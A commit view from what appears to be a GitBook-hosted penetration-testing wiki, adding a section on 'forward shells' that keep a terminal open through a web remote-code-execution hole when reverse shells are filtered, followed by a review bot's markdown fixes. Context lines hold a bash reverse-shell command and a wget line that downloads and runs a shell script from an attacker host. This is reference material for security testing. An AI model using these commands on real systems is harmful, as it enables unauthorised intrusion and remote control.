GitBook: [#3002] No subject

CPol 2022-02-09 20:23:12 +00:00 committed by gitbook-bot
parent 23949d07c5
commit 9008bae6b3
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

@ -40,6 +40,19 @@ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Forward Shell
You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)****
You just need to modify:
* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
## Netcat
```bash
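Review bot: The added Forward Shell section has markdown and wording defects that will render badly. The link line ends in an empty bold marker (`****`) right after `(https://github.com/IppSec/forward-shell)`, and the first sentence reads "a **RCE in a web app in a, Linux machine**" with a stray comma. Suggest dropping the `****`, rewording to "an **RCE in a web app on a Linux machine**", writing "iptables" in lower case, and replacing the trailing `\` line break with a blank line. There is also no blank line between the `## Forward Shell` heading and its paragraph, between "You just need to modify:" and the bullet list, or before `## Netcat`; adding them keeps the list and headings parsed consistently across renderers. Separately, the context line shown in the hunk header contains `/dev/tcp/1<ATTACKER-IP>/<PORT>` with a stray `1` before the placeholder; it is outside this change but worth a follow-up fix.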